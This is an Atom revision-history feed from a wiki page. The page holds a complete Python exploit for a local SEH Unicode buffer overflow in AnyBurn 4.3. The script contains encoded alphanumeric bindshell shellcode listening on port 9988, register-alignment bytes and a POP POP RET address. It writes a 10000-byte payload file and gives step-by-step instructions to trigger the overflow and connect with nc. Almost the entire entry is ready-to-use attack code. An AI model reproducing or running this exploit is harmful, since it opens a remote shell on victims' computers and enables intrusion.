<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=AnyBurn_4.3_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>AnyBurn 4.3 本地緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=AnyBurn_4.3_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=AnyBurn_4.3_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-03T23:38:15Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=AnyBurn_4.3_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=685&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python  # Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode) # Date: 20-12-2018 # Exploit Author: Matteo Malvica # Vendor Homepage:...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=AnyBurn_4.3_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=685&amp;oldid=prev"/>
		<updated>2021-03-27T02:51:46Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/env python  # Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode) # Date: 20-12-2018 # Exploit Author: Matteo Malvica # Vendor Homepage:...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
&lt;br /&gt;
# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)&lt;br /&gt;
# Date: 20-12-2018&lt;br /&gt;
# Exploit Author: Matteo Malvica&lt;br /&gt;
# Vendor Homepage: http://www.anyburn.com/&lt;br /&gt;
# Software Link : http://www.anyburn.com/anyburn_setup.exe&lt;br /&gt;
# Tested Version: 4.3 (32-bit) &lt;br /&gt;
# Tested on: Windows 7 x64 SP1&lt;br /&gt;
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002&lt;br /&gt;
&lt;br /&gt;
# Steps to reproduce:&lt;br /&gt;
# 1.- Run the python code&lt;br /&gt;
# 2.- Open exploit.txt and copy its content to the clipboard&lt;br /&gt;
# 3.- Open AnyBurn and choose 'Copy disk to Image'&lt;br /&gt;
# 4.- Paste the content of exploit.txt into the field: 'Image file name'&lt;br /&gt;
# 5.- Click 'Create Now' &lt;br /&gt;
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988&lt;br /&gt;
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# alphanumeric bindshell - port 9988, courtesy of b33f&lt;br /&gt;
shellcode = (&lt;br /&gt;
&amp;quot;PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1&amp;quot;&lt;br /&gt;
&amp;quot;AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA&amp;quot;&lt;br /&gt;
&amp;quot;BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC&amp;quot;&lt;br /&gt;
&amp;quot;BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4&amp;quot;&lt;br /&gt;
&amp;quot;KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM&amp;quot;&lt;br /&gt;
&amp;quot;1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI&amp;quot;&lt;br /&gt;
&amp;quot;CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ&amp;quot;&lt;br /&gt;
&amp;quot;JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN&amp;quot;&lt;br /&gt;
&amp;quot;IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9&amp;quot;&lt;br /&gt;
&amp;quot;K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50&amp;quot;&lt;br /&gt;
&amp;quot;SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP&amp;quot;&lt;br /&gt;
&amp;quot;WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2&amp;quot;&lt;br /&gt;
&amp;quot;6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG&amp;quot;&lt;br /&gt;
&amp;quot;EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# total payload length 10000&lt;br /&gt;
&lt;br /&gt;
align = (&lt;br /&gt;
&amp;quot;\x55&amp;quot;                      #push EBP - closer register to our shellcode, from where we are pivoting&lt;br /&gt;
&amp;quot;\x6e&amp;quot;                      #Venetian Padding&lt;br /&gt;
&amp;quot;\x58&amp;quot;                      #pop EAX&lt;br /&gt;
&amp;quot;\x6e&amp;quot;                      #Venetian Padding&lt;br /&gt;
&amp;quot;\x05\x22\x11&amp;quot;              #add eax,0x11002200  \&lt;br /&gt;
&amp;quot;\x6e&amp;quot;                      #Venetian Padding     |&amp;gt; +0xB00 &lt;br /&gt;
&amp;quot;\x2d\x17\x11&amp;quot;              #sub eax,0x11001700  /&lt;br /&gt;
&amp;quot;\x6e&amp;quot;                      #Venetian Padding&lt;br /&gt;
&amp;quot;\x50&amp;quot;                      #push EAX&lt;br /&gt;
&amp;quot;\x6e&amp;quot;                      #Venetian Padding&lt;br /&gt;
&amp;quot;\xC3&amp;quot;)                     #RETN&lt;br /&gt;
&lt;br /&gt;
nseh = &amp;quot;\x94\x94&amp;quot; 			# ANSI x94 translates to Unicode 201D&lt;br /&gt;
seh =  &amp;quot;\xb5\x4d&amp;quot; 			# 0x004d00b5 POP POP RET in AnyBurn.exe module&lt;br /&gt;
&lt;br /&gt;
preamble = &amp;quot;\x58&amp;quot; * 47 + shellcode + &amp;quot;\x58&amp;quot; * (9197-47- len(shellcode)) + nseh + seh&lt;br /&gt;
unicode_nops = &amp;quot;\x58&amp;quot; * 200&lt;br /&gt;
exploit = preamble + align + unicode_nops + &amp;quot;\x58&amp;quot; * (10000 - len(preamble) - len(unicode_nops)-len(align))&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
	f=open(&amp;quot;exploit.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
	print &amp;quot;[+] Creating %s bytes lasagna payload..&amp;quot; %len(exploit)&lt;br /&gt;
	f.write(exploit)&lt;br /&gt;
	f.close()&lt;br /&gt;
	print &amp;quot;[+] File created!&amp;quot;&lt;br /&gt;
except:&lt;br /&gt;
	print &amp;quot;File cannot be created&amp;quot;&lt;br /&gt;
            &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>